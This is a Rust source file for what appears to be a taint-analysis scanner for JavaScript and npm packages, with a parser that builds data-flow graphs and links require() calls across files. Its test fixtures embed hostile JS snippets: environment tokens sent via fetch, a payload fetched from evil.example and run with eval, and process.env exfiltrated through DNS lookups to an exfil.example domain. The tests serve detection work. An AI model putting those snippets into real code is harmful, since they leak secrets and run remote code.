use std::collections::HashMap;
use std::path::{Path, PathBuf};
use swc_common::{sync::Lrc, FileName, SourceMap};
use swc_common::errors::{emitter::EmitterWriter, Handler};
use swc_ecma_ast::*;
use swc_ecma_parser::{lexer::Lexer, Parser, StringInput, Syntax};
use swc_ecma_visit::Visit;
use crate::error::Result;
use crate::error::Error;
pub(crate) use crate::ir::{EdgeKind, NodeId, NodeKind, TaintGraph};
pub(crate) use crate::labels::LabelSet;
use super::resolve::resolve_require;
mod expressions;
mod labels_default;
mod scope;
mod visitor;
pub use labels_default::default_label_set;
pub(crate) use labels_default::apply_labels;
pub(crate) use scope::Scope;
/// Stateful JS/TS parser that accumulates a [`TaintGraph`] across one or
/// more parsed modules.
///
/// Usage pattern (see `parse_package_with_labels`): call
/// `set_current_file` + `parse_module` per file, drain per-file results
/// with `take_requires` / `take_require_calls` / `module_exports`, then
/// `clear_file_state` before the next file. The graph itself is shared
/// across all files and extracted once with `into_graph`.
pub struct JsParser {
    /// Taint graph built up across every `parse_module` call.
    pub(super) graph: TaintGraph,
    /// Path of the file currently being parsed; drives TS-vs-ES syntax
    /// selection and names the swc source file.
    pub(super) current_file: PathBuf,
    /// Lexical scope stack for the file being parsed.
    pub(super) scopes: Vec<Scope>,
    /// `require(...)` binding sites: (binding node, module specifier).
    /// Linked to the target file's exports with a `Call` edge.
    pub(super) requires: Vec<(NodeId, String)>,
    /// Bare `require(...)` call sites: (call node, module specifier).
    /// Linked from the target file's exports with an `Assignment` edge.
    pub(super) require_calls: Vec<(NodeId, String)>,
    /// Node representing `module.exports` for the current file, if seen.
    pub(super) module_exports: Option<NodeId>,
    /// Node of the function currently being visited, if any.
    pub(super) current_function_node: Option<NodeId>,
    /// Parameter nodes of the most recently visited function.
    pub(super) last_fn_params: Option<Vec<NodeId>>,
    /// Taint sources to wire into the next callback's parameters
    /// (one entry per parameter position; `None` = untainted).
    pub(super) pending_callback_param_sources: Option<Vec<Option<NodeId>>>,
    /// Registered event handlers: (handler node, its parameter nodes).
    /// NOTE(review): not cleared by `clear_file_state` — presumably kept
    /// for cross-file linking; confirm.
    pub(super) event_handlers: Vec<(NodeId, Vec<NodeId>)>,
    /// Function name -> parameter nodes, for wiring later calls.
    /// NOTE(review): also survives `clear_file_state` — confirm intent.
    pub(super) function_params: HashMap<String, Vec<NodeId>>,
    /// Constant-folded string values known per variable name.
    pub(super) known_strings: HashMap<String, String>,
    /// Constant-folded string-array values known per variable name.
    pub(super) known_arrays: HashMap<String, Vec<String>>,
    /// Promise node awaiting resolution wiring, if any.
    pub(super) pending_promise_node: Option<NodeId>,
    /// (promise node, resolver node) pairs to connect after the visit.
    pub(super) promise_resolvers: Vec<(NodeId, NodeId)>,
    /// Object node -> (property name, property node) bindings, used for
    /// precise per-property (destructuring) taint.
    pub(super) composite_bindings: HashMap<NodeId, Vec<(String, NodeId)>>,
    /// Member-expression paths that have been written to at least once.
    pub(super) assigned_members: std::collections::HashSet<String>,
    /// Current nesting depth of function expressions being visited.
    pub(super) fn_expr_depth: usize,
    /// Parameter nodes of the outermost (depth-0) function expression.
    pub(super) fn_expr_params_at_depth_0: Option<Vec<NodeId>>,
    /// Arbitrary node -> parameter nodes mapping (e.g. for callbacks
    /// referenced by node rather than by name).
    pub(super) node_to_params: HashMap<NodeId, Vec<NodeId>>,
}
impl JsParser {
    /// Creates a parser with an empty graph and no per-file state.
    pub fn new() -> Self {
        Self {
            graph: TaintGraph::new(),
            current_file: PathBuf::from("."),
            scopes: Vec::new(),
            requires: Vec::new(),
            require_calls: Vec::new(),
            module_exports: None,
            current_function_node: None,
            last_fn_params: None,
            pending_callback_param_sources: None,
            event_handlers: Vec::new(),
            function_params: HashMap::new(),
            known_strings: HashMap::new(),
            known_arrays: HashMap::new(),
            pending_promise_node: None,
            promise_resolvers: Vec::new(),
            composite_bindings: HashMap::new(),
            assigned_members: std::collections::HashSet::new(),
            fn_expr_depth: 0,
            fn_expr_params_at_depth_0: None,
            node_to_params: HashMap::new(),
        }
    }

    /// Points the parser at `path` for the next `parse_module` call and
    /// resets the scope stack and the module-exports marker.
    ///
    /// NOTE(review): this deliberately resets less than
    /// `clear_file_state`; multi-file callers are expected to call
    /// `clear_file_state` after finishing each file.
    pub fn set_current_file(&mut self, path: PathBuf) {
        self.current_file = path;
        self.scopes.clear();
        self.module_exports = None;
    }

    /// Clears per-file bookkeeping so the parser can be reused for the
    /// next file. The accumulated graph is kept, as are
    /// `function_params`, `event_handlers`, `current_function_node` and
    /// `last_fn_params` (presumably for cross-file wiring — confirm).
    pub fn clear_file_state(&mut self) {
        self.scopes.clear();
        self.module_exports = None;
        self.known_strings.clear();
        self.known_arrays.clear();
        self.pending_callback_param_sources = None;
        self.pending_promise_node = None;
        self.promise_resolvers.clear();
        self.requires.clear();
        self.require_calls.clear();
        self.composite_bindings.clear();
        self.assigned_members.clear();
        self.fn_expr_depth = 0;
        self.fn_expr_params_at_depth_0 = None;
        self.node_to_params.clear();
    }

    /// Parses `src` as a module and feeds the AST to the visitor,
    /// growing `self.graph`.
    ///
    /// The grammar is chosen from the current file's extension: `.ts`
    /// gets the TypeScript syntax (with TSX enabled), everything else is
    /// parsed as ECMAScript with JSX enabled.
    ///
    /// # Errors
    /// Returns `Error::Analysis` when swc fails to parse the source.
    pub fn parse_module(&mut self, src: &str) -> Result<()> {
        // swc's Parser reports failures through its return value, so no
        // error Handler needs to be installed here (the previous
        // Handler/EmitterWriter construction was dead code and removed).
        let cm: Lrc<SourceMap> = Default::default();
        let fm = cm.new_source_file(
            FileName::Custom(self.current_file.to_string_lossy().into_owned()).into(),
            src.into(),
        );
        let syntax = if self.current_file.extension().and_then(|s| s.to_str()) == Some("ts") {
            Syntax::Typescript(swc_ecma_parser::TsSyntax { tsx: true, ..Default::default() })
        } else {
            Syntax::Es(swc_ecma_parser::EsSyntax { jsx: true, ..Default::default() })
        };
        let lexer = Lexer::new(
            syntax,
            Default::default(),
            StringInput::from(&*fm),
            None,
        );
        let mut parser = Parser::new_from(lexer);
        let module = parser
            .parse_module()
            .map_err(|e| Error::Analysis(format!("{:?}", e)))?;
        self.visit_module(&module);
        Ok(())
    }

    /// Consumes the parser and returns the accumulated graph.
    pub fn into_graph(self) -> TaintGraph {
        self.graph
    }

    /// Mutable access to the graph (used for post-parse edge wiring).
    pub fn graph_mut(&mut self) -> &mut TaintGraph {
        &mut self.graph
    }

    /// Drains the `require(...)` binding sites collected for this file.
    pub fn take_requires(&mut self) -> Vec<(NodeId, String)> {
        std::mem::take(&mut self.requires)
    }

    /// Drains the bare `require(...)` call sites collected for this file.
    pub fn take_require_calls(&mut self) -> Vec<(NodeId, String)> {
        std::mem::take(&mut self.require_calls)
    }

    /// Node representing `module.exports` for the current file, if any.
    pub fn module_exports(&self) -> Option<NodeId> {
        self.module_exports
    }
}
pub fn parse_js_with_labels(
source: &str,
filename: &str,
labels: Option<&LabelSet>,
) -> Result<TaintGraph> {
let mut parser = JsParser::new();
parser.set_current_file(PathBuf::from(filename));
parser.parse_module(source)?;
let mut graph = parser.into_graph();
let label_set = labels.map_or_else(default_label_set, |l| l.clone());
apply_labels(&mut graph, &label_set);
graph.set_label_set(label_set);
Ok(graph)
}
/// Parses a single JS/TS source string using the default label set.
///
/// Thin wrapper over [`parse_js_with_labels`] with `labels = None`.
pub fn parse_js(source: &str, filename: &str) -> Result<TaintGraph> {
    parse_js_with_labels(source, filename, None)
}
/// Recursively collects every `*.js` file under `dir` into `out`.
///
/// Non-directories are ignored at the top level; directories are walked
/// depth-first. Only files whose extension is exactly `js` are kept.
fn collect_js_files(dir: &Path, out: &mut Vec<PathBuf>) -> Result<()> {
    if !dir.is_dir() {
        return Ok(());
    }
    for entry in std::fs::read_dir(dir)? {
        let path = entry?.path();
        if path.is_dir() {
            collect_js_files(&path, out)?;
        } else if path.is_file() && path.extension().and_then(|s| s.to_str()) == Some("js") {
            out.push(path);
        }
    }
    Ok(())
}
pub fn parse_package_with_labels(
dir: &Path,
labels: Option<&LabelSet>,
) -> Result<TaintGraph> {
let mut files = Vec::new();
collect_js_files(dir, &mut files)?;
let mut parser = JsParser::new();
let mut file_exports: HashMap<PathBuf, NodeId> = HashMap::new();
let mut all_requires: Vec<(PathBuf, NodeId, String)> = Vec::new();
let mut all_require_calls: Vec<(PathBuf, NodeId, String)> = Vec::new();
for file in &files {
parser.set_current_file(file.clone());
let source = std::fs::read_to_string(file)
.map_err(|e| Error::Io(e))?;
parser.parse_module(&source)?;
if let Some(exports) = parser.module_exports() {
file_exports.insert(file.clone(), exports);
}
for (node_id, spec) in parser.take_requires() {
all_requires.push((file.clone(), node_id, spec));
}
for (node_id, spec) in parser.take_require_calls() {
all_require_calls.push((file.clone(), node_id, spec));
}
parser.clear_file_state();
}
let package_json_path = dir.join("package.json");
if package_json_path.is_file() {
if let Ok(source) = std::fs::read_to_string(&package_json_path) {
let _ = super::package_json::populate_package_json_graph(&source, &mut parser.graph);
}
}
for (from_file, node_id, spec) in all_requires {
if let Some(resolved) = resolve_require(&from_file, &spec) {
if let Some(&exports) = file_exports.get(&resolved) {
parser.graph_mut().add_edge(node_id, exports, EdgeKind::Call);
}
}
}
for (from_file, node_id, spec) in all_require_calls {
if let Some(resolved) = resolve_require(&from_file, &spec) {
if let Some(&exports) = file_exports.get(&resolved) {
parser.graph_mut().add_edge(exports, node_id, EdgeKind::Assignment);
}
}
}
let mut graph = parser.into_graph();
let label_set = labels.map_or_else(default_label_set, |l| l.clone());
apply_labels(&mut graph, &label_set);
graph.set_label_set(label_set);
Ok(graph)
}
/// Parses a package directory using the default label set.
///
/// Thin wrapper over [`parse_package_with_labels`] with `labels = None`.
pub fn parse_package(dir: &Path) -> Result<TaintGraph> {
    parse_package_with_labels(dir, None)
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Parses `js` and reports whether the analyzer produces any findings.
    fn has_findings(js: &str) -> bool {
        let graph = parse_js(js, "test.js").unwrap();
        !crate::analyze(&graph).unwrap().is_empty()
    }

    // An env read flowing into fetch() must produce both a source-labeled
    // and a sink-labeled node.
    #[test]
    fn parse_js_source_to_sink_path() {
        let source = "var x = process.env.TOKEN; fetch(x);";
        let graph = parse_js(source, "test.js").unwrap();
        let has_source = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_source()));
        let has_sink = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_sink()));
        assert!(has_source, "expected a source node");
        assert!(has_sink, "expected a sink node");
    }

    // Merely requiring a library must not create sources or sinks.
    #[test]
    fn parse_js_require_express_no_taint() {
        let source = "const express = require('express');";
        let graph = parse_js(source, "test.js").unwrap();
        let has_source = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_source()));
        let has_sink = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_sink()));
        assert!(!has_source, "express should not create a source");
        assert!(!has_sink, "express should not create a sink");
    }

    // Package parsing should at least record an Import node for a
    // relative require between two files.
    #[test]
    fn parse_package_links_require() {
        let dir = tempfile::tempdir().unwrap();
        let index = dir.path().join("index.js");
        let helper = dir.path().join("helper.js");
        std::fs::write(&index, "const h = require('./helper'); h.run();").unwrap();
        std::fs::write(&helper, "exports.run = function() { fetch('x'); };").unwrap();
        let graph = parse_package(dir.path()).unwrap();
        let require_nodes: Vec<_> = graph.nodes().iter()
            .filter(|n| n.kind == NodeKind::Import && n.name.contains("require"))
            .collect();
        assert!(!require_nodes.is_empty(), "expected a require import node");
    }

    // Diagnostic regression test: request-body taint through nested event
    // handlers into eval() must be detected. Prints nodes/edges/findings
    // to ease debugging on failure.
    #[test]
    fn debug_getcookies_60() {
        let js = r#"
var http = require('http');
http.createServer(function(req, res) {
var body = '';
req.on('data', function(chunk) { body += chunk; });
req.on('end', function() {
var json = JSON.parse(body);
eval(json.code);
});
}).listen(8080);
"#;
        let graph = parse_js(js, "debug.js").unwrap();
        for n in graph.nodes() {
            eprintln!("Node {}: {} {:?} {:?}", n.id, n.name, n.kind, n.label);
        }
        for id in 0..graph.node_count() as u32 {
            for neighbor in graph.neighbors(id) {
                eprintln!("Edge: {} -> {}", id, neighbor);
            }
        }
        let findings = crate::analyze(&graph).unwrap();
        eprintln!("Findings: {:?}", findings);
        assert!(!findings.is_empty());
    }

    // Optional-call syntax (`eval?.(...)`) must still propagate taint.
    #[test]
    fn optional_call_propagates_taint() {
        assert!(has_findings("eval?.(process.env.TOKEN);"));
    }

    // Data chunks from a network response listener are tainted.
    #[test]
    fn network_response_listener_chunk_is_tainted() {
        let js = r#"
const https = require('https');
https.get('https://evil.example/payload', function(res) {
res.on('data', function(chunk) {
eval(chunk);
});
});
"#;
        assert!(has_findings(js));
    }

    // Array element taint must reach the callback parameter of map().
    #[test]
    fn array_callback_param_receives_element_taint() {
        let js = r#"
const arr = [process.env.TOKEN];
const mapped = arr.map(function(value) {
return value.trim();
});
eval(mapped.join(''));
"#;
        assert!(has_findings(js));
    }

    // Destructuring an untainted property must NOT inherit taint from a
    // sibling tainted property (per-property precision).
    #[test]
    fn destructuring_uses_precise_property_taint() {
        let js = r#"
const src = { safe: 'ok', secret: process.env.TOKEN };
const { safe } = src;
fetch(safe);
"#;
        assert!(!has_findings(js));
    }

    // The condition of a ternary must not taint the chosen branch value.
    #[test]
    fn ternary_test_does_not_taint_result() {
        let js = r#"
const cond = process.env.TOKEN;
const value = cond ? 'safe-left' : 'safe-right';
fetch(value);
"#;
        assert!(!has_findings(js));
    }

    // Proxy `get` trap (inline handler object) receives target taint.
    #[test]
    fn proxy_get_handler_receives_target_taint_inline() {
        let js = r#"
new Proxy(process.env, {
get(target, prop) {
fetch(target[prop]);
return target[prop];
}
});
"#;
        assert!(has_findings(js));
    }

    // Same as above, but with the handler bound to a variable first.
    #[test]
    fn proxy_get_handler_receives_target_taint_variable() {
        let js = r#"
const handler = {
get(target, prop) {
fetch(target[prop]);
return target[prop];
}
};
new Proxy(process.env, handler);
"#;
        assert!(has_findings(js));
    }

    // A named callback passed to Promise.then must receive the resolved
    // value's taint.
    #[test]
    fn promise_then_named_callback_wired() {
        let js = r#"
const handler = (res) => fetch(res);
Promise.resolve(process.env.TOKEN).then(handler);
"#;
        assert!(has_findings(js));
    }

    // Reading `obj.x` snapshots the value: a later write to `obj.x` must
    // create a node distinct from the read snapshot.
    #[test]
    fn member_expr_read_snapshot_not_conflated_with_write() {
        let js = r#"
const obj = { x: 1 };
const original = obj.x;
obj.x = 2;
fetch(original);
"#;
        let graph = parse_js(js, "test.js").unwrap();
        let obj_x_nodes: Vec<_> = graph.nodes().iter().filter(|n| n.name == "obj.x").collect();
        assert!(obj_x_nodes.len() >= 2, "expected snapshot node separate from location node");
    }
}
#[cfg(test)]
mod debug_tests2 {
    use super::*;
    use crate::analyze;

    // Diagnostic-only test for an APT-style exfiltration pattern:
    // env snapshot -> nextTick callback -> DNS lookup of an encoded
    // hostname. Dumps nodes and the finding count; makes no assertion,
    // so it exists purely to inspect graph construction.
    #[test]
    fn debug_apt_bb_builder() {
        let js = r#"
var e = JSON.stringify(process.env);
process.nextTick(function() {
require('dns').lookup(e.slice(0, 60) + '.exfil.example', function() {});
});
"#;
        let graph = parse_js(js, "test.js").unwrap();
        eprintln!("Nodes:");
        for node in graph.nodes() {
            eprintln!(" id={} kind={:?} name={:?} label={:?}", node.id, node.kind, node.name, node.label);
        }
        let findings = analyze(&graph).unwrap();
        eprintln!("Findings: {}", findings.len());
    }
}